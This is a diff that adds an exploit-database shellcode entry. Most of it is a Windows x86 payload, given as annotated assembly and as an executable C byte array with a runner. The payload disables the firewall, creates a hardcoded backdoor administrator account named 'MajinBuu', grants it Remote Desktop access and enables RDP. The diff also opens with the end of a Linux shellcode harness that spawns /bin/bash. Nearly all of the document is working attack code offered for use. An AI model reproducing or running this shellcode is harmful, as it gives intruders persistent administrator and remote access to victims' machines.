"\x48\x83\xc1\x0b\xf3\xa6\x0f\x85\x74\xff\xff\xff\x48\x31\xf6\x48"
"\xf7\xe6\x48\x31\xff\x57\x48\x83\xc2\x68\x52\x48\xba\x2f\x62\x69"
"\x6e\x2f\x62\x61\x73\x52\x48\x31\xd2\x48\x89\xe7\xb0\x3b\x0f\x05";
int main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}

285
shellcodes/windows/48355.c Normal file
View file

@ -0,0 +1,285 @@
## Exploit Title: Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
## Exploit Author: Bobby Cooke
## Date: 2020-04-20
## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86)
## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators' & 'Remote Desktop Users', and then enables the RDP Service.
## Commands used:
## 'netsh firewall set opmode mode=DISABLE'
## 'net user MajinBuu TurnU2C@ndy!! /add'
## 'net localgroup Administrators MajinBuu /add'
## 'net localgroup "Remote Desktop Users" MajinBuu /add'
## 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
; Create stack frame
mov ebp, esp
sub esp, 0x30
; Find kernel32.dll base address
xor ebx, ebx
mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB
mov ebx, [ebx+0xC] ; EBX = Address_of_LDR
mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll
mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll
mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll
mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll
mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll
; Find the address of the Export Table within kernel32.dll
mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader
add ebx, eax ; EBX = &NewEXEHeader
mov ebx, [ebx+0x78] ; EBX = RVA ExportTable
add ebx, eax ; EBX = &ExportTable
; Find the address of the Name Pointer Table within kernel32.dll
mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable
add edi, eax ; EDI = &NamePointerTable
mov [ebp-0x8], edi ; save &NamePointerTable to stack frame
; Find the address of the Ordinal Table
mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable
add ecx, eax ; ECX = &OrdinalTable
mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame
; Find the address of the Address Table
mov edx, [ebx+0x1C] ; EDX = RVA AddressTable
add edx, eax ; EDX = &AddressTable
mov [ebp-0x10], edx ; save &AddressTable to stack-frame
; Find Number of Functions within the Export Table of kernel32.dll
mov edx, [ebx+0x14] ; EDX = Number of Functions
mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame
jmp short functions
findFunctionAddr:
; Initialize the Counter to prevent infinite loop
xor eax, eax ; EAX = Counter = 0
mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame
; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll
searchLoop:
mov edi, [ebp-0x8] ; EDI = &NamePointerTable
mov esi, [ebp-0x18] ; ESI = Address of String for the Symbol we are searching for
xor ecx, ecx ; ECX = 0x00000000
cld ; clear direction flag - Process strings from left to right
mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)]
add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll
add cx, 0xF ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null
repe cmpsb ; compare first 8 bytes of [&NameString] to "GetProcAddress,0x00"
jz found ; If string at [&NameString] == "GetProcAddress,0x00", then end loop
inc eax ; else Counter ++
cmp eax, edx ; Does EAX == Number of Functions?
jb searchLoop ; If EAX != Number of Functions, then restart the loop
found:
; Find the address of GetProcAddress by using the last value of the Counter
mov ecx, [ebp-0xC] ; ECX = &OrdinalTable
mov edx, [ebp-0x10] ; EDX = &AddressTable
mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)]
mov eax, [edx + eax*4] ; EAX = RVA GetProcAddress = [&AddressTable + ordinalNumber]
add eax, [ebp-0x4] ; EAX = &GetProcAddress = RVA GetProcAddress + &kernel32.dll
ret
functions:
# Push string "GetProcAddress",0x00 onto the stack
xor eax, eax ; clear eax register
mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register
push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s"
push 0x65726464 ; erdd : 65726464 // "GetProcAddress"
push 0x41636f72 ; Acor : 41636f72
push 0x50746547 ; PteG : 50746547
mov [ebp-0x18], esp ; save PTR to string at bottom of stack (ebp)
call findFunctionAddr ; After Return EAX will = &GetProcAddress
# EAX = &GetProcAddress
mov [ebp-0x1C], eax ; save &GetProcAddress
; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00)
xor edx, edx ; EDX = 0x00000000
push edx ; null terminator for LoadLibraryA string
push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00
push 0x7262694c ; rbiL : 7262694c
push 0x64616f4c ; daoL : 64616f4c
push esp ; $hModule -- push the address of the start of the string onto the stack
push dword [ebp-0x4] ; $lpProcName -- push base address of kernel32.dll to the stack
mov eax, [ebp-0x1C] ; Move the address of GetProcAddress into the EAX register
call eax ; Call the GetProcAddress Function.
mov [ebp-0x20], eax ; save Address of LoadLibraryA
; Call LoadLibraryA(PTR "msvcrt")
; push "msvcrt",0x00 to the stack and save pointer
xor eax, eax ; clear eax
mov ax, 0x7472 ; tr : 7472
push eax
push 0x6376736D ; cvsm : 6376736D
push esp ; push the pointer to the string
mov ebx, [ebp-0x20] ; LoadLibraryA Address to ebx register
call ebx ; call the LoadLibraryA Function to load msvcrt.dll
mov [ebp-0x24], eax ; save Address of msvcrt.dll
; Call GetProcAddress(msvcrt.dll, "system")
xor edx, edx
mov dx, 0x6d65 ; me : 6d65
push edx
push 0x74737973 ; tsys : 74737973
push esp ; push pointer to string to stack for 'system'
push dword [ebp-0x24] ; push base address of msvcrt.dll to stack
mov eax, [ebp-0x1C] ; PTR to GetProcAddress to EAX
call eax ; GetProcAddress
; EAX = WSAStartup Address
mov [ebp-0x28], eax ; save Address of msvcrt.system
; 'netsh firewall set opmode mode=DISABLE'
xor ecx, ecx
mov cx, 0x454c ; EL : 454c
push ecx
push 0x42415349 ; BASI : 42415349
push 0x443d6564 ; D=ed : 443d6564
push 0x6f6d2065 ; om e : 6f6d2065
push 0x646f6d70 ; domp : 646f6d70
push 0x6f207465 ; o te : 6f207465
push 0x73206c6c ; s ll : 73206c6c
push 0x61776572 ; awer : 61776572
push 0x69662068 ; if h : 69662068
push 0x7374656e ; sten : 7374656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
; 'net user MajinBuu TurnU2C@ndy!! /add'
xor ecx, ecx
push ecx
push 0x6464612f ; dda/ : 6464612f
push 0x20212179 ; !!y : 20212179
push 0x646e4043 ; dn@C : 646e4043
push 0x32556e72 ; 2Unr : 32556e72
push 0x75542075 ; uT u : 75542075
push 0x75426e69 ; uBni : 75426e69
push 0x6a614d20 ; jaM : 6a614d20
push 0x72657375 ; resu : 72657375
push 0x2074656e ; ten : 2074656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
; 'net localgroup Administrators MajinBuu /add'
xor ecx, ecx
push ecx
mov ecx, 0x64646190 ; dda : 646461
shr ecx, 8
push ecx
push 0x2f207575 ; / uu : 2f207575
push 0x426e696a ; Bnij : 426e696a
push 0x614d2073 ; aM s : 614d2073
push 0x726f7461 ; rota : 726f7461
push 0x72747369 ; rtsi : 72747369
push 0x6e696d64 ; nimd : 6e696d64
push 0x41207075 ; A pu : 41207075
push 0x6f72676c ; orgl : 6f72676c
push 0x61636f6c ; acol : 61636f6c
push 0x2074656e ; ten : 2074656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
; 'net localgroup "Remote Desktop Users" MajinBuu /add'
xor ecx, ecx
push ecx
mov ecx, 0x64646190 ; dda : 646461
shr ecx, 8
push ecx
push 0x2f207575 ; / uu : 2f207575
push 0x426e696a ; Bnij : 426e696a
push 0x614d2022 ; aM " : 614d2022
push 0x73726573 ; sres : 73726573
push 0x5520706f ; U po : 5520706f
push 0x746b7365 ; tkse : 746b7365
push 0x44206574 ; D et : 44206574
push 0x6f6d6552 ; omeR : 6f6d6552
push 0x22207075 ; " pu : 22207075
push 0x6f72676c ; orgl : 6f72676c
push 0x61636f6c ; acol : 61636f6c
push 0x2074656e ; ten : 2074656e
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
xor ecx, ecx
push ecx
push 0x662f2030 ; f/ 0 : 662f2030
push 0x20642f20 ; d/ : 20642f20
push 0x44524f57 ; DROW : 44524f57
push 0x445f4745 ; D_GE : 445f4745
push 0x5220742f ; R t/ : 5220742f
push 0x20736e6f ; sno : 20736e6f
push 0x69746365 ; itce : 69746365
push 0x6e6e6f43 ; nnoC : 6e6e6f43
push 0x5354796e ; STyn : 5354796e
push 0x65446620 ; eDf : 65446620
push 0x762f2022 ; v/ " : 762f2022
push 0x72657672 ; revr : 72657672
push 0x6553206c ; eS l : 6553206c
push 0x616e696d ; anim : 616e696d
push 0x7265545c ; reT\ : 7265545c
push 0x6c6f7274 ; lort : 6c6f7274
push 0x6e6f435c ; noC\ : 6e6f435c
push 0x7465536c ; teSl : 7465536c
push 0x6f72746e ; ortn : 6f72746e
push 0x6f43746e ; oCtn : 6f43746e
push 0x65727275 ; erru : 65727275
push 0x435c4d45 ; C\ME : 435c4d45
push 0x54535953 ; TSYS : 54535953
push 0x5c454e49 ; \ENI : 5c454e49
push 0x4843414d ; HCAM : 4843414d
push 0x5f4c4143 ; _LAC : 5f4c4143
push 0x4f4c5f59 ; OL_Y : 4f4c5f59
push 0x454b4822 ; EKH" : 454b4822
push 0x20646461 ; dda : 20646461
push 0x20676572 ; ger : 20676572
push esp ; push pointer to string
mov eax, [ebp-0x28] ; msvcrt.system address
call eax ; call system
######################################################################################
#include <windows.h>
#include <stdio.h>
char code[] = \
"\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b"
"\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7"
"\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53"
"\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b"
"\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4"
"\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50"
"\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff"
"\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f"
"\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50"
"\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52"
"\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9"
"\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d"
"\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66"
"\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68"
"\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69"
"\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45"
"\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68"
"\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64"
"\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65"
"\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68"
"\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f"
"\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70"
"\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8"
"\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68"
"\x45\x47\x5f\x44\x68\x2f\x74\x20\x52\x68\x6f\x6e\x73\x20\x68\x65\x63\x74\x69\x68\x43"
"\x6f\x6e\x6e\x68\x6e\x79\x54\x53\x68\x20\x66\x44\x65\x68\x22\x20\x2f\x76\x68\x72\x76"
"\x65\x72\x68\x6c\x20\x53\x65\x68\x6d\x69\x6e\x61\x68\x5c\x54\x65\x72\x68\x74\x72\x6f"
"\x6c\x68\x5c\x43\x6f\x6e\x68\x6c\x53\x65\x74\x68\x6e\x74\x72\x6f\x68\x6e\x74\x43\x6f"
"\x68\x75\x72\x72\x65\x68\x45\x4d\x5c\x43\x68\x53\x59\x53\x54\x68\x49\x4e\x45\x5c\x68"
"\x4d\x41\x43\x48\x68\x43\x41\x4c\x5f\x68\x59\x5f\x4c\x4f\x68\x22\x48\x4b\x45\x68\x61"
"\x64\x64\x20\x68\x72\x65\x67\x20\x54\x8b\x45\xd8\xff\xd0";
int main(int argc, char **argv)
{
int (*func)();
func = (int(*)()) code;
(int)(*func)();
}